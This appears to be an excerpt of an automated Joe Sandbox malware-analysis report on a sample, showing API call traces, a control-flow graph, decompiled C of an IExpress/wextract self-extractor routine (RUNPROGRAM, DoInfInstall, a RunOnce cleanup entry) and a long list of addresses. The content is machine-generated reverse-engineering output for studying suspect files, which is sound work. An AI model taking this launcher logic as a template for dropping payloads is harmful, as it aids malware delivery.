                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A4218C
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A421C1
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A421E4
                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00A4223D
                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42249
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00A42250
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                            • API String ID: 178549006-3765599613
                                                                                                                                                                                                                                            • Opcode ID: 7ea4bfd4ccc26a5d1aa26feb9e9ffb3a9214bb5eef41147725e79a22ddc24702
                                                                                                                                                                                                                                            • Instruction ID: 636353a74a93ab31f92028475598d3ddc03be4b74975bf9ca08c1c24c368b0d1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ea4bfd4ccc26a5d1aa26feb9e9ffb3a9214bb5eef41147725e79a22ddc24702
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E951077DA40214ABDB20DBA4DC49FEB777CEFD5700F0002A4F905E6151DAB69E86CB60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 36 a43ba2-a43bd9 37 a43bfd-a43bff 36->37 38 a43bdb-a43bee call a4468f 36->38 39 a43c03-a43c28 memset 37->39 45 a43bf4-a43bf7 38->45 46 a43d13-a43d30 call a444b9 38->46 41 a43d35-a43d48 call a41781 39->41 42 a43c2e-a43c40 call a4468f 39->42 48 a43d4d-a43d52 41->48 42->46 53 a43c46-a43c49 42->53 45->37 45->46 58 a43f4d 46->58 51 a43d54-a43d6c call a4468f 48->51 52 a43d9e-a43db6 call a41ae8 48->52 51->46 65 a43d6e-a43d75 51->65 52->58 69 a43dbc-a43dc2 52->69 53->46 56 a43c4f-a43c56 53->56 61 a43c60-a43c65 56->61 62 a43c58-a43c5e 56->62 59 a43f4f-a43f63 call a46ce0 58->59 67 a43c75-a43c7c 61->67 68 a43c67-a43c6d 61->68 66 a43c6e-a43c73 62->66 71 a43fda-a43fe1 65->71 72 a43d7b-a43d98 CompareStringA 65->72 73 a43c87-a43c89 66->73 67->73 76 a43c7e-a43c82 67->76 68->66 74 a43dc4-a43dce 69->74 75 a43de6-a43de8 69->75 79 a43fe3 call a42267 71->79 80 a43fe8-a43fea 71->80 72->52 72->71 73->48 82 a43c8f-a43c98 73->82 74->75 81 a43dd0-a43dd7 74->81 77 a43dee-a43df5 75->77 78 a43f0b-a43f15 call a43fef 75->78 76->73 83 a43fab-a43fd2 call a444b9 LocalFree 77->83 84 a43dfb-a43dfd 77->84 92 a43f1a-a43f1c 78->92 79->80 80->59 81->75 87 a43dd9-a43ddb 81->87 88 a43cf1-a43cf3 82->88 89 a43c9a-a43c9c 82->89 83->58 84->78 90 a43e03-a43e0a 84->90 87->77 93 a43ddd-a43de1 call a4202a 87->93 88->52 91 a43cf9-a43d11 call a4468f 88->91 95 a43ca5-a43ca7 89->95 96 a43c9e-a43ca3 89->96 90->78 99 a43e10-a43e19 call a46495 90->99 91->46 91->48 101 a43f46-a43f47 LocalFree 92->101 102 a43f1e-a43f2d LocalFree 92->102 93->75 95->58 98 a43cad 95->98 97 a43cb2-a43cc5 call a4468f 96->97 97->46 112 a43cc7-a43ce8 CompareStringA 97->112 98->97 113 a43f92-a43fa9 call a444b9 99->113 114 a43e1f-a43e36 GetProcAddress 99->114 101->58 108 a43fd7-a43fd9 102->108 109 a43f33-a43f3b 102->109 108->71 109->39 112->88 115 a43cea-a43ced 112->115 126 a43f7c-a43f90 LocalFree call a46285 113->126 116 a43f64-a43f76 call a444b9 FreeLibrary 114->116 117 a43e3c-a43e80 114->117 115->88 116->126 120 a43e82-a43e87 117->120 121 a43e8b-a43e94 117->121 120->121 124 a43e96-a43e9b 121->124 125 a43e9f-a43ea2 121->125 124->125 128 a43ea4-a43ea9 125->128 129 a43ead-a43eb6 125->129 126->58 128->129 131 a43ec1-a43ec3 129->131 132 a43eb8-a43ebd 129->132 133 a43ec5-a43eca 131->133 134 a43ece-a43eec 131->134 132->131 133->134 137 a43ef5-a43efd 134->137 138 a43eee-a43ef3 134->138 139 a43f40 FreeLibrary 137->139 140 a43eff-a43f09 FreeLibrary 137->140 138->137 139->101 140->102
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A43BA2() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				short _v300;
                                                                                                                                                                                                                                            				intOrPtr _v304;
                                                                                                                                                                                                                                            				void _v348;
                                                                                                                                                                                                                                            				char _v352;
                                                                                                                                                                                                                                            				intOrPtr _v356;
                                                                                                                                                                                                                                            				signed int _v360;
                                                                                                                                                                                                                                            				short _v364;
                                                                                                                                                                                                                                            				char* _v368;
                                                                                                                                                                                                                                            				intOrPtr _v372;
                                                                                                                                                                                                                                            				void* _v376;
                                                                                                                                                                                                                                            				intOrPtr _v380;
                                                                                                                                                                                                                                            				char _v384;
                                                                                                                                                                                                                                            				signed int _v388;
                                                                                                                                                                                                                                            				intOrPtr _v392;
                                                                                                                                                                                                                                            				signed int _v396;
                                                                                                                                                                                                                                            				signed int _v400;
                                                                                                                                                                                                                                            				signed int _v404;
                                                                                                                                                                                                                                            				void* _v408;
                                                                                                                                                                                                                                            				void* _v424;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                            				signed int _t79;
                                                                                                                                                                                                                                            				short _t96;
                                                                                                                                                                                                                                            				signed int _t97;
                                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                                                                                            				signed int _t108;
                                                                                                                                                                                                                                            				int _t112;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				signed char _t118;
                                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                                            				signed int _t127;
                                                                                                                                                                                                                                            				void* _t128;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                            				void* _t130;
                                                                                                                                                                                                                                            				short _t137;
                                                                                                                                                                                                                                            				char* _t140;
                                                                                                                                                                                                                                            				signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0xa49124 =  *0xa49124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0xa48a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0xa48c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E00A4468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								L11:
                                                                                                                                                                                                                                            								_v300 = 0;
                                                                                                                                                                                                                                            								L14:
                                                                                                                                                                                                                                            								if(_t127 != 0) {
                                                                                                                                                                                                                                            									L27:
                                                                                                                                                                                                                                            									_t155 = 1;
                                                                                                                                                                                                                                            									__eflags = _t127 - 1;
                                                                                                                                                                                                                                            									if(_t127 != 1) {
                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                            										_t132 =  &_v280;
                                                                                                                                                                                                                                            										_t76 = E00A41AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                            										__eflags = _t76;
                                                                                                                                                                                                                                            										if(_t76 == 0) {
                                                                                                                                                                                                                                            											L62:
                                                                                                                                                                                                                                            											_t77 = 0;
                                                                                                                                                                                                                                            											L63:
                                                                                                                                                                                                                                            											_pop(_t150);
                                                                                                                                                                                                                                            											_pop(_t156);
                                                                                                                                                                                                                                            											_pop(_t128);
                                                                                                                                                                                                                                            											return E00A46CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t157 = _v404;
                                                                                                                                                                                                                                            										__eflags = _t149;
                                                                                                                                                                                                                                            										if(_t149 != 0) {
                                                                                                                                                                                                                                            											L37:
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												L57:
                                                                                                                                                                                                                                            												_t151 = _v408;
                                                                                                                                                                                                                                            												_t146 =  &_v352;
                                                                                                                                                                                                                                            												_t130 = _t151; // executed
                                                                                                                                                                                                                                            												_t79 = E00A43FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                            												__eflags = _t79;
                                                                                                                                                                                                                                            												if(_t79 == 0) {
                                                                                                                                                                                                                                            													L61:
                                                                                                                                                                                                                                            													LocalFree(_t151);
                                                                                                                                                                                                                                            													goto L62;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												L58:
                                                                                                                                                                                                                                            												LocalFree(_t151);
                                                                                                                                                                                                                                            												_t127 = _t127 + 1;
                                                                                                                                                                                                                                            												_v396 = _t127;
                                                                                                                                                                                                                                            												__eflags = _t127 - 2;
                                                                                                                                                                                                                                            												if(_t127 >= 2) {
                                                                                                                                                                                                                                            													_t155 = 1;
                                                                                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                                                                                            													L69:
                                                                                                                                                                                                                                            													__eflags =  *0xa48580;
                                                                                                                                                                                                                                            													if( *0xa48580 != 0) {
                                                                                                                                                                                                                                            														E00A42267();
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            													_t77 = _t155;
                                                                                                                                                                                                                                            													goto L63;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												_t153 = _v392;
                                                                                                                                                                                                                                            												_t149 = _v388;
                                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											L38:
                                                                                                                                                                                                                                            											__eflags =  *0xa48180;
                                                                                                                                                                                                                                            											if( *0xa48180 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c7;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            												LocalFree(_v424);
                                                                                                                                                                                                                                            												 *0xa49124 = 0x8007042b;
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t157;
                                                                                                                                                                                                                                            											if(_t157 == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa49a34 & 0x00000004;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												goto L57;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t129 = E00A46495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                                                            											__eflags = _t129;
                                                                                                                                                                                                                                            											if(_t129 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c8;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                                                            												L65:
                                                                                                                                                                                                                                            												LocalFree(_v408);
                                                                                                                                                                                                                                            												 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            												goto L62;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                                                            											_v404 = _t146;
                                                                                                                                                                                                                                            											__eflags = _t146;
                                                                                                                                                                                                                                            											if(_t146 == 0) {
                                                                                                                                                                                                                                            												_t146 = 0x4c9;
                                                                                                                                                                                                                                            												__eflags = 0;
                                                                                                                                                                                                                                            												E00A444B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                                                            												FreeLibrary(_t129);
                                                                                                                                                                                                                                            												goto L65;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags =  *0xa48a30;
                                                                                                                                                                                                                                            											_t151 = _v408;
                                                                                                                                                                                                                                            											_v384 = 0;
                                                                                                                                                                                                                                            											_v368 =  &_v280;
                                                                                                                                                                                                                                            											_t96 =  *0xa49a40; // 0x3
                                                                                                                                                                                                                                            											_v364 = _t96;
                                                                                                                                                                                                                                            											_t97 =  *0xa48a38 & 0x0000ffff;
                                                                                                                                                                                                                                            											_v380 = 0xa49154;
                                                                                                                                                                                                                                            											_v376 = _t151;
                                                                                                                                                                                                                                            											_v372 = 0xa491e4;
                                                                                                                                                                                                                                            											_v360 = _t97;
                                                                                                                                                                                                                                            											if( *0xa48a30 != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t144 =  *0xa49a34; // 0x1
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                                                            											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t145 =  *0xa48d48; // 0x0
                                                                                                                                                                                                                                            											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                                                            											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                                                            												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                                                            												__eflags = _t97;
                                                                                                                                                                                                                                            												_v360 = _t97;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											__eflags = _t145;
                                                                                                                                                                                                                                            											if(_t145 < 0) {
                                                                                                                                                                                                                                            												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                                                            												__eflags = _t104;
                                                                                                                                                                                                                                            												_v360 = _t104;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t98 =  *0xa49a38; // 0x0
                                                                                                                                                                                                                                            											_v356 = _t98;
                                                                                                                                                                                                                                            											_t130 = _t146;
                                                                                                                                                                                                                                            											 *0xa4a288( &_v384);
                                                                                                                                                                                                                                            											_t101 = _v404();
                                                                                                                                                                                                                                            											__eflags = _t164 - _t164;
                                                                                                                                                                                                                                            											if(_t164 != _t164) {
                                                                                                                                                                                                                                            												_t130 = 4;
                                                                                                                                                                                                                                            												asm("int 0x29");
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											 *0xa49124 = _t101;
                                                                                                                                                                                                                                            											_push(_t129);
                                                                                                                                                                                                                                            											__eflags = _t101;
                                                                                                                                                                                                                                            											if(_t101 < 0) {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												goto L61;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												FreeLibrary();
                                                                                                                                                                                                                                            												_t127 = _v400;
                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa49a40 - 1; // 0x3
                                                                                                                                                                                                                                            										if(__eflags == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags =  *0xa48a20;
                                                                                                                                                                                                                                            										if( *0xa48a20 == 0) {
                                                                                                                                                                                                                                            											goto L37;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										__eflags = _t157;
                                                                                                                                                                                                                                            										if(_t157 != 0) {
                                                                                                                                                                                                                                            											goto L38;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            										E00A4202A(_t146); // executed
                                                                                                                                                                                                                                            										goto L37;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v280;
                                                                                                                                                                                                                                            									_t108 = E00A4468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                                                            									__eflags = _t108;
                                                                                                                                                                                                                                            									if(_t108 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									__eflags =  *0xa48c42;
                                                                                                                                                                                                                                            									if( *0xa48c42 != 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                                                            									__eflags = _t112 == 0;
                                                                                                                                                                                                                                            									if(_t112 == 0) {
                                                                                                                                                                                                                                            										goto L69;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t118 =  *0xa48a38; // 0x0
                                                                                                                                                                                                                                            								if(_t118 == 0) {
                                                                                                                                                                                                                                            									L23:
                                                                                                                                                                                                                                            									if(_t153 != 0) {
                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A4468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                                                            										goto L27;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L25;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                                                            									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                                                            										goto L62;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "USRQCMD";
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									_t146 =  &_v276;
                                                                                                                                                                                                                                            									if(E00A4468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                                                            										_t153 = 1;
                                                                                                                                                                                                                                            										_v388 = 1;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = "ADMQCMD";
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L26:
                                                                                                                                                                                                                                            						_push(_t130);
                                                                                                                                                                                                                                            						_t146 = 0x104;
                                                                                                                                                                                                                                            						E00A41781( &_v276, 0x104, _t130, 0xa48c42);
                                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t130 = "REBOOT";
                                                                                                                                                                                                                                            				_t125 = E00A4468F(_t130, 0xa49a2c, 4);
                                                                                                                                                                                                                                            				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





























































                                                                                                                                                                                                                                            0x00a43baa
                                                                                                                                                                                                                                            0x00a43bb0
                                                                                                                                                                                                                                            0x00a43bb7
                                                                                                                                                                                                                                            0x00a43bc0
                                                                                                                                                                                                                                            0x00a43bc2
                                                                                                                                                                                                                                            0x00a43bc9
                                                                                                                                                                                                                                            0x00a43bcb
                                                                                                                                                                                                                                            0x00a43bcf
                                                                                                                                                                                                                                            0x00a43bd3
                                                                                                                                                                                                                                            0x00a43bd9
                                                                                                                                                                                                                                            0x00a43bfd
                                                                                                                                                                                                                                            0x00a43bfd
                                                                                                                                                                                                                                            0x00a43bff
                                                                                                                                                                                                                                            0x00a43c03
                                                                                                                                                                                                                                            0x00a43c03
                                                                                                                                                                                                                                            0x00a43c11
                                                                                                                                                                                                                                            0x00a43c16
                                                                                                                                                                                                                                            0x00a43c19
                                                                                                                                                                                                                                            0x00a43c28
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c30
                                                                                                                                                                                                                                            0x00a43c39
                                                                                                                                                                                                                                            0x00a43c40
                                                                                                                                                                                                                                            0x00a43d13
                                                                                                                                                                                                                                            0x00a43d15
                                                                                                                                                                                                                                            0x00a43d21
                                                                                                                                                                                                                                            0x00a43d26
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c4f
                                                                                                                                                                                                                                            0x00a43c56
                                                                                                                                                                                                                                            0x00a43c60
                                                                                                                                                                                                                                            0x00a43c65
                                                                                                                                                                                                                                            0x00a43c77
                                                                                                                                                                                                                                            0x00a43c78
                                                                                                                                                                                                                                            0x00a43c7c
                                                                                                                                                                                                                                            0x00a43c7e
                                                                                                                                                                                                                                            0x00a43c82
                                                                                                                                                                                                                                            0x00a43c82
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c7c
                                                                                                                                                                                                                                            0x00a43c67
                                                                                                                                                                                                                                            0x00a43c69
                                                                                                                                                                                                                                            0x00a43c6d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43c58
                                                                                                                                                                                                                                            0x00a43c58
                                                                                                                                                                                                                                            0x00a43c6e
                                                                                                                                                                                                                                            0x00a43c6e
                                                                                                                                                                                                                                            0x00a43c87
                                                                                                                                                                                                                                            0x00a43c89
                                                                                                                                                                                                                                            0x00a43d4d
                                                                                                                                                                                                                                            0x00a43d4f
                                                                                                                                                                                                                                            0x00a43d50
                                                                                                                                                                                                                                            0x00a43d52
                                                                                                                                                                                                                                            0x00a43d9e
                                                                                                                                                                                                                                            0x00a43da8
                                                                                                                                                                                                                                            0x00a43daf
                                                                                                                                                                                                                                            0x00a43db4
                                                                                                                                                                                                                                            0x00a43db6
                                                                                                                                                                                                                                            0x00a43f4d
                                                                                                                                                                                                                                            0x00a43f4d
                                                                                                                                                                                                                                            0x00a43f4f
                                                                                                                                                                                                                                            0x00a43f56
                                                                                                                                                                                                                                            0x00a43f57
                                                                                                                                                                                                                                            0x00a43f58
                                                                                                                                                                                                                                            0x00a43f63
                                                                                                                                                                                                                                            0x00a43f63
                                                                                                                                                                                                                                            0x00a43dbc
                                                                                                                                                                                                                                            0x00a43dc0
                                                                                                                                                                                                                                            0x00a43dc2
                                                                                                                                                                                                                                            0x00a43de6
                                                                                                                                                                                                                                            0x00a43de6
                                                                                                                                                                                                                                            0x00a43de8
                                                                                                                                                                                                                                            0x00a43f0b
                                                                                                                                                                                                                                            0x00a43f0b
                                                                                                                                                                                                                                            0x00a43f0f
                                                                                                                                                                                                                                            0x00a43f13
                                                                                                                                                                                                                                            0x00a43f15
                                                                                                                                                                                                                                            0x00a43f1a
                                                                                                                                                                                                                                            0x00a43f1c
                                                                                                                                                                                                                                            0x00a43f46
                                                                                                                                                                                                                                            0x00a43f47
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f47
                                                                                                                                                                                                                                            0x00a43f1e
                                                                                                                                                                                                                                            0x00a43f1f
                                                                                                                                                                                                                                            0x00a43f25
                                                                                                                                                                                                                                            0x00a43f26
                                                                                                                                                                                                                                            0x00a43f2a
                                                                                                                                                                                                                                            0x00a43f2d
                                                                                                                                                                                                                                            0x00a43fd9
                                                                                                                                                                                                                                            0x00a43fd9
                                                                                                                                                                                                                                            0x00a43fda
                                                                                                                                                                                                                                            0x00a43fda
                                                                                                                                                                                                                                            0x00a43fe1
                                                                                                                                                                                                                                            0x00a43fe3
                                                                                                                                                                                                                                            0x00a43fe3
                                                                                                                                                                                                                                            0x00a43fe8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43fe8
                                                                                                                                                                                                                                            0x00a43f33
                                                                                                                                                                                                                                            0x00a43f37
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43f37
                                                                                                                                                                                                                                            0x00a43dee
                                                                                                                                                                                                                                            0x00a43dee
                                                                                                                                                                                                                                            0x00a43df5
                                                                                                                                                                                                                                            0x00a43fad
